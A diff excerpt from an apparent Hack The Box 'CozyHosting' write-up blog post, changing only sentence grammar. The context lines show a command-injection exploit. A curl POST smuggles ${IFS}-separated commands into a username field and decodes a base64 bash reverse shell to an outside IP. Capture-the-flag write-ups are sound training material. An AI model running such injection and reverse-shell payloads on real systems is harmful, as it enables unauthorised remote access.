joaoandreotti/buxfox.github.io/_posts/2024-03-02-writeups-cozyhosting-htb.md

 At this moment we know that the server is executing the ssh command which has a basic syntax of `ssh USERNAME@HOSTNAME`.
 We can build a reverse shell command.
-In the following tests we found that there are a whitespace filter on username.
+In the following test we found that there is a whitespace filter on the username field.
 To bypass the filter we can use ${IFS} instead of spaced and execute our reverse shell.
 ```
 $ curl -vv -X POST http://cozyhosting.htb/executessh -H 'Cookie: JSESSIONID=60624E501F34D4469CFBE1CD53AF3273' --data 'username=;echo${IFS}YmFzaCAtaSA%2BJiAvZGV2L3RjcC8xMC4xMC4xNC4xMTEvNTU1NSAwPiYxCg==${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash;&host=host'